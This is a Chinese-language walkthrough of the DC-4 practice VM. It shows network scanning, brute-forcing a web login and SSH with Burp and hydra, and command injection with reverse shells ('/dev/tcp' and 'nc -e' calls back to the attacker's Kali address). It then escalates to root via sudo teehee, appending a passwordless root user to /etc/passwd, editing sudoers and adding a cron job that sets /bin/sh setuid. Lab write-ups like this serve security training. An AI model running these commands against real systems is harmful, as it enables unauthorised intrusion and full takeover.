目录
b.写入sudoers文件,使其可以root身份运行所有命令
信息收集:
1.存活扫描:
由于靶机和kali都是nat的网卡,都在一个网段,我们用arp-scan会快一点:
arp-scan
arp-scan -I eth0 -l
靶机ip:172.16.1.130
└─# arp-scan -I eth0 -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:dd:ee:6a, IPv4: 172.16.1.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
172.16.1.1 00:50:56:c0:00:08 VMware, Inc.
172.16.1.2 00:50:56:e5:b1:08 VMware, Inc.
172.16.1.130 00:0c:29:a4:44:6b VMware, Inc.
172.16.1.254 00:50:56:e2:96:e1 VMware, Inc.
2.端口扫描:
nmap -sS -p- 172.16.1.130
nmap -sS -p- 172.16.1.130
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3.服务扫描:
nmap -sS -sCV --version-all -O -p 22,80 172.16.1.130
nmap -sS -sCV --version-all -O -p 22,80 172.16.1.130
------------------------
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
| 256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
|_ 256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)
80/tcp open http nginx 1.15.10
|_http-server-header: nginx/1.15.10
|_http-title: System Tools
MAC Address: 00:0C:29:A4:44:6B (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
WEB部分:
1.尝试sql注入:
sqlmap -u "172.16.1.130" --risk=3 --level=5 --dbs
不出意外的没有成功
2.burpsuite弱口令:
这里发现是要admin账户登录
开启 burpsuite 设置一下参数开始爆破
这里是导入的字典:
开始爆破,等待结果:
这数量,,有点久啊
等待结果的同时顺带用dirsearch做个目录扫描:
dirsearch -u http://172.16.1.130
Target: http://172.16.1.130/
[18:15:14] Starting:
[18:15:34] 302 - 704B - /command.php -> index.php
[18:15:36] 301 - 170B - /css -> http://172.16.1.130/css/
[18:15:44] 301 - 170B - /images -> http://172.16.1.130/images/
[18:15:44] 403 - 556B - /images/
[18:15:44] 403 - 15B - /index.pHp
[18:15:48] 302 - 206B - /login.php -> index.php
[18:15:48] 302 - 163B - /logout.php -> index.php
好吧 啥也没有。。安心等爆破结果吧。
ok了 运气还可以,
账密:admin/happy
发现是命令执行
3.burpsuite命令执行:
我们构造一个反弹shell,同时在kali上开启监听:
kali:nc -lvvp 7723
bp:/bin/sh+-i+>&+/dev/tcp/172.16.1.128/7723+0>&1 //命令没错 但是没反应可能是 & 的问题 换一个试试
nc+-e+/bin/bash+172.16.1.128+7723
换了命令就解决了,,,
交互式shell:python -c 'import pty;pty.spawn("/bin/bash")'
root权限:
1.先查看用户账密:
cat /etc/passwd
www-data@dc-4:/usr/share/nginx/html$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
...
...
nginx:x:107:111:nginx user,,,:/nonexistent:/bin/false
charles:x:1001:1001:Charles,,,:/home/charles:/bin/bash
jim:x:1002:1002:Jim,,,:/home/jim:/bin/bash
sam:x:1003:1003:Sam,,,:/home/sam:/bin/bash
Debian-exim:x:108:112::/var/spool/exim4:/bin/false
查看家目录的所有用户的所有文件:
ls -la /home/*
www-data@dc-4:/usr/share/nginx/html$ ls -la /home/*
/home/charles:
total 20
drwxr-xr-x 2 charles charles 4096 Apr 7 2019 .
drwxr-xr-x 5 root root 4096 Apr 7 2019 ..
-rw-r--r-- 1 charles charles 220 Apr 6 2019 .bash_logout
-rw-r--r-- 1 charles charles 3526 Apr 6 2019 .bashrc
-rw-r--r-- 1 charles charles 675 Apr 6 2019 .profile
/home/jim:
total 32
drwxr-xr-x 3 jim jim 4096 Apr 7 2019 .
drwxr-xr-x 5 root root 4096 Apr 7 2019 ..
-rw-r--r-- 1 jim jim 220 Apr 6 2019 .bash_logout
-rw-r--r-- 1 jim jim 3526 Apr 6 2019 .bashrc
-rw-r--r-- 1 jim jim 675 Apr 6 2019 .profile
drwxr-xr-x 2 jim jim 4096 Apr 7 2019 backups
-rw------- 1 jim jim 528 Apr 6 2019 mbox
-rwsrwxrwx 1 jim jim 174 Apr 6 2019 test.sh
/home/sam:
total 20
drwxr-xr-x 2 sam sam 4096 Apr 7 2019 .
drwxr-xr-x 5 root root 4096 Apr 7 2019 ..
-rw-r--r-- 1 sam sam 220 Apr 6 2019 .bash_logout
-rw-r--r-- 1 sam sam 3526 Apr 6 2019 .bashrc
-rw-r--r-- 1 sam sam 675 Apr 6 2019 .profile
没有什么有用的信息,我们去看看 jim目录下的backups的备份文件,就它的权限最低。
www-data@dc-4:/home/jim/backups$ ls -la
total 12
drwxr-xr-x 2 jim jim 4096 Apr 7 2019 .
drwxr-xr-x 3 jim jim 4096 Apr 7 2019 ..
-rw-r--r-- 1 jim jim 2047 Apr 7 2019 old-passwords.bak
2.ssh爆破登录
将里面的内容保存过来,我们对 这四个 这个用户进行 ssh 爆破:
hydra
hydra -L users.txt -P old-passwords.txt ssh://172.16.1.130
爆破成功,账密:jim/jibril04
hydra -L users.txt -P old-passwords.txt ssh://172.16.1.130
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-01-25 21:22:29
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1008 login tries (l:4/p:252), ~63 tries per task
[DATA] attacking ssh://172.16.1.130:22/
[22][ssh] host: 172.16.1.130 login: jim password: jibril04
我们去看看邮件:
cd /mail
发现新账密:
charles/^xHhA&hvim0y
3.切换用户:
su charles
4.提权:
tee提权会,但是teehee是个什么鬼?
a.在/etc/passwd中增加无密码用户提权
echo "admin::0:0:::/bin/bash" |sudo teehee -a /etc/passwd
添加用户
su admin
id
b.写入sudoers文件,使其可以root身份运行所有命令
这里先利用上一步的root权限看看 cat /etc/sudoers 的内容
root@dc-4:/var/mail# cat /etc/sudoers
#
# This file MUST be edited with the 'visudo' command as root.
#
# Please consider adding local content in /etc/sudoers.d/ instead of
# directly modifying this file.
#
# See the man page for details on how to write a sudoers file.
#
Defaults env_reset
Defaults mail_badpass
Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
# Host alias specification
# User alias specification
# Cmnd alias specification
# User privilege specification
root ALL=(ALL:ALL) ALL
# Allow members of group sudo to execute any command
%sudo ALL=(ALL:ALL) ALL
# See sudoers(5) for more information on "#include" directives:
#includedir /etc/sudoers.d
charles ALL=(root) NOPASSWD:/usr/bin/teehee
回到charles 用户
echo "charles ALL=(ALL:ALL) ALL" | sudo teehee -a /etc/sudoers
whoami
id
sudo su root
c.通过定时任务执行脚本提权
向/etc/crontab文件中写入新的定时任务
时间部分全部填写为*,意思是每分钟执行一次,通过写入将/bin/sh的权限修改为4777,这样就可以在非root用户下执行它,并且执行期间拥有root权限。
查看计划任务:
cat /etc/crontab
echo "* * * * * root chmod 4777 /bin/sh" | sudo teehee -a /etc/crontab